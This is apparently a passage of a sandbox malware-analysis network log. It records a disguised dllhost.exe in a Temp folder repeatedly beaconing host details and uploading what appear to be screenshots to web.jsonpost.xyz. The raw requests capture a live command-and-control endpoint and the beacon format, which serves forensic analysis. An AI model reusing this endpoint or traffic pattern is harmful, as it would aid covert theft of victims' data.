Nov 29, 2024 01:53:07.551235914 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: web.jsonpost.xyz
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.4 | 49850 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:07.570525885 CET | 196 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----20803717bf274c582f30f80916c596d3
Host: web.jsonpost.xyz
Content-Length: 102801
Cache-Control: no-cache
Nov 29, 2024 01:53:07.570565939 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 32 30 38 30 33 37 31 37 62 66 32 37 34 63 35 38 32 66 33 30 66 38 30 39 31 36 63 35 39 36 64 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
Data Ascii: ------20803717bf274c582f30f80916c596d3Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.4 | 49856 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:08.967962027 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
89 | 192.168.2.4 | 49857 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:09.075057030 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98018
                                                                                Cache-Control: no-cache
Nov 29, 2024 01:53:09.075125933 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 62 33 37 31 34 34 37 36 31 39 36 62 62 36 31 36 36 39 32 63 36 64 65 64 30 38 65 37 61 61 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
Data Ascii:
------b3714476196bb616692c6ded08e7aac7
Content-Disposition: form-data; name="data"; filename="152122461226.jpg"
Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
90 | 192.168.2.4 | 49858 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:10.326472998 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
91 | 192.168.2.4 | 49860 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:10.593267918 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98018
                                                                                Cache-Control: no-cache
Nov 29, 2024 01:53:10.593336105 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 62 33 37 31 34 34 37 36 31 39 36 62 62 36 31 36 36 39 32 63 36 64 65 64 30 38 65 37 61 61 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
Data Ascii:
------b3714476196bb616692c6ded08e7aac7
Content-Disposition: form-data; name="data"; filename="152122461226.jpg"
Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.2.4 | 49865 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:11.750669003 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.4 | 49866 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:12.080267906 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1f222d7432ca15c9e43b1e0ff82cdbaa
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98266
                                                                                Cache-Control: no-cache
Nov 29, 2024 01:53:12.080324888 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 31 66 32 32 32 64 37 34 33 32 63 61 31 35 63 39 65 34 33 62 31 65 30 66 66 38 32 63 64 62 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
Data Ascii:
------1f222d7432ca15c9e43b1e0ff82cdbaa
Content-Disposition: form-data; name="data"; filename="152122461226.jpg"
Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.4 | 49871 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:13.172992945 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.4 | 49872 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:13.600236893 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98018
                                                                                Cache-Control: no-cache
Nov 29, 2024 01:53:13.600323915 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 62 33 37 31 34 34 37 36 31 39 36 62 62 36 31 36 36 39 32 63 36 64 65 64 30 38 65 37 61 61 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
Data Ascii:
------b3714476196bb616692c6ded08e7aac7
Content-Disposition: form-data; name="data"; filename="152122461226.jpg"
Content-Type: application/octet-stream
                                                                                Data Ascii: <,$}??^Wx?wBbgfN8WWnP7xBjS^BQKE{E)bQKI@QL(0(1PQPIKI@`%(L(4Q@E-%1!4QE))i()))h((QERZ)QE0(Q@PhSH)QERRLb-'z`
                                                                                Nov 29, 2024 01:53:13.840536118 CET4944OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.4 | 49873 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:14.546977043 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.4 | 49874 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:14.598989010 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98018
                                                                                Cache-Control: no-cache
Nov 29, 2024 01:53:14.599049091 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 62 33 37 31 34 34 37 36 31 39 36 62 62 36 31 36 36 39 32 63 36 64 65 64 30 38 65 37 61 61 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------b3714476196bb616692c6ded08e7aac7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.4 | 49880 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:15.945132017 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.4 | 49881 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:16.318600893 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----2b8041a10abd63097aaf92c151839ca7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98296
                                                                                Cache-Control: no-cache
Nov 29, 2024 01:53:16.318648100 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 32 62 38 30 34 31 61 31 30 61 62 64 36 33 30 39 37 61 61 66 39 32 63 31 35 31 38 33 39 63 61 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------2b8041a10abd63097aaf92c151839ca7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
100 | 192.168.2.4 | 49883 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:17.326968908 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port
101 | 192.168.2.4 | 49888 | 72.52.178.23 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:17.828219891 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98018
                                                                                Cache-Control: no-cache
Nov 29, 2024 01:53:17.828286886 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 62 33 37 31 34 34 37 36 31 39 36 62 62 36 31 36 36 39 32 63 36 64 65 64 30 38 65 37 61 61 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------b3714476196bb616692c6ded08e7aac7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.4 | 49889 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:18.703598976 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.4 | 49890 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:19.484946966 CET | 196 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----5add77a23e85c1c8c456f4525574afb1
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 103478
                                                                                Cache-Control: no-cache
Nov 29, 2024 01:53:19.485008955 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 35 61 64 64 37 37 61 32 33 65 38 35 63 31 63 38 63 34 35 36 66 34 35 32 35 35 37 34 61 66 62 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------5add77a23e85c1c8c456f4525574afb1Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                104 | 192.168.2.4 | 49895 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:53:20.124274969 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                105 | 192.168.2.4 | 49897 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:53:20.241677999 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98018
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:53:20.241677999 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 62 33 37 31 34 34 37 36 31 39 36 62 62 36 31 36 36 39 32 63 36 64 65 64 30 38 65 37 61 61 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------b3714476196bb616692c6ded08e7aac7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                106 | 192.168.2.4 | 49898 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:53:21.546031952 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                107 | 192.168.2.4 | 49899 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:53:21.789654970 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98018
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:53:21.789705038 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 62 33 37 31 34 34 37 36 31 39 36 62 62 36 31 36 36 39 32 63 36 64 65 64 30 38 65 37 61 61 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------b3714476196bb616692c6ded08e7aac7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                108 | 192.168.2.4 | 49905 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:53:22.998848915 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                109 | 192.168.2.4 | 49906 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:53:23.268933058 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98018
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:53:23.268969059 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 62 33 37 31 34 34 37 36 31 39 36 62 62 36 31 36 36 39 32 63 36 64 65 64 30 38 65 37 61 61 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------b3714476196bb616692c6ded08e7aac7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                110 | 192.168.2.4 | 49911 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:53:24.483777046 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                111 | 192.168.2.4 | 49913 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:53:24.709474087 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----edaa48f9ea7e20f29ead8fcbe5fb1f54
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98554
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:53:24.709549904 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 65 64 61 61 34 38 66 39 65 61 37 65 32 30 66 32 39 65 61 64 38 66 63 62 65 35 66 62 31 66 35 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------edaa48f9ea7e20f29ead8fcbe5fb1f54Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


                                                                                Session ID: 112
                                                                                Source IP: 192.168.2.4
                                                                                Source Port: 49914
                                                                                Destination IP: 72.52.178.23
                                                                                Destination Port: 80
                                                                                PID: 7608
                                                                                Process: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp: Nov 29, 2024 01:53:25.858565092 CET
                                                                                Bytes transferred: 235
                                                                                Direction: OUT
                                                                                Data:
                                                                                POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
